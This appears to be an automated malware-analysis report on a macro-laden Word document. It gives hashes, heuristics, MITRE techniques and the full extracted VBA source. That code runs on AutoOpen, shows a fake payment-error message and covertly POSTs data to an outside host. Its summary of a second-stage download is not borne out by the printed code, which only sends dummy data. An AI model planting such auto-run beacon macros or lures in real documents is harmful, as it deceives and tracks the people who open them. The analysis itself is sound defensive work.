Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 b9c6ec5a153e938c…

MALICIOUS

Office (OLE)

435.5 KB Created: 2017-08-30 08:45:00 Authoring application: Microsoft Office Word First seen: 2020-09-07
MD5: 165156bb9009f9f45ca078a71cb92764 SHA-1: c56001862d7a7598d24ba2503b19ce00f622b586 SHA-256: b9c6ec5a153e938cd96f0b6acc16a51ea65b70577d9d1b04161738fcfff69c1a
182 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1140 Deobfuscate or Obfuscate

The sample contains VBA macros, including an AutoOpen macro, which is a common technique for malicious documents. The script uses CreateObject to instantiate WinHttp.WinHttpRequest.5.1 and IEPostData, suggesting it attempts to download and execute a second-stage payload from the embedded URL. The document body's claim of being 'protected' is a lure to encourage macro execution.

Heuristics 7

  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://bucck.info/d08vw6h0l20sme8w######################################################################################################################## In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/bibliographyIn document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2854 bytes
SHA-256: cb3fa589304c691f701c695a163bcb1a0145d7597fe156f6f92136ede0028ac1
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"
Option Explicit
'Option Base 0
 
Const MAX_ATTEMPTS = 1
Const CONNECTION_TIMEOUT = 60
Const HTTP_READY = 4
 
' Run process
Sub RunProcess(sURL)
    Dim lAttempt, tmr
    
    If InStr(1, sURL, "%lucy_url%") > 0 Then
        Exit Sub
    End If

    lAttempt = 0
    
    ' Post data
    While IEPostData(sURL, "data=RHVtbXkgZGF0YSBmcm9tIEhUVFAtb25seSBtYWNybw==") = False And lAttempt < MAX_ATTEMPTS
        tmr = Timer()

        Do
        Loop Until (Timer() - tmr) > 1

        lAttempt = lAttempt + 1
    Wend
    
    If lAttempt = MAX_ATTEMPTS Then
        WinHTTPPostData sURL, "data=RHVtbXkgZGF0YSBmcm9tIEhUVFAtb25seSBtYWNybw=="
    End If
    
    On Error Resume Next
End Sub

' WinHTTP post data
Function WinHTTPPostData(sURL, sData) As String
    On Error Resume Next
    
    Dim objHTTP, strResult
    Set objHTTP = CreateObject("WinHttp.WinHttpRequest.5.1")

    objHTTP.Open "POST", sURL, False
    objHTTP.setRequestHeader "User-Agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
    objHTTP.setRequestHeader "Content-type", "application/x-www-form-urlencoded"
    objHTTP.send (sData)
    strResult = objHTTP.responseText
    Set objHTTP = Nothing
    
    WinHTTPPostData = strResult
End Function

' IE post data
Function IEPostData(sURL, sData)
    On Error Resume Next

    Dim dtmp, objIE
    Dim bData() As Byte
    
    ReDim bData(Len(sData) - 1)
    bData = StrConv(sData, vbFromUnicode)
    
    Set objIE = CreateObject("InternetExplorer.Application")
    objIE.Visible = False
    objIE.Navigate sURL, Nothing, Nothing, bData, "Content-Type: application/x-www-form-urlencoded" + Chr(10) + Chr(13)
    
    dtmp = Timer()

    Do
    Loop Until (Not objIE.busy And objIE.ReadyState = HTTP_READY) Or (Timer() - dtmp) > CONNECTION_TIMEOUT
    
    IEPostData = (Not objIE.busy And objIE.ReadyState = HTTP_READY)
    
    objIE.Quit
    Set objIE = Nothing
End Function

' Clean variable string
Function Clean(data)
    If InStr(1, data, "#") > 0 Then
        Clean = Left(data, InStr(1, data, "#") - 1)
    Else
        Clean = data
    End If
End Function

' Main function
Sub AutoOpen()
    Dim sURL
 
    sURL = "http://bucck.info/d08vw6h0l20sme8w########################################################################################################################"
    MsgBox "We are sorry - your payment data could not be retrieved. Pleaase try again later"
    RunProcess Clean(sURL)
End Sub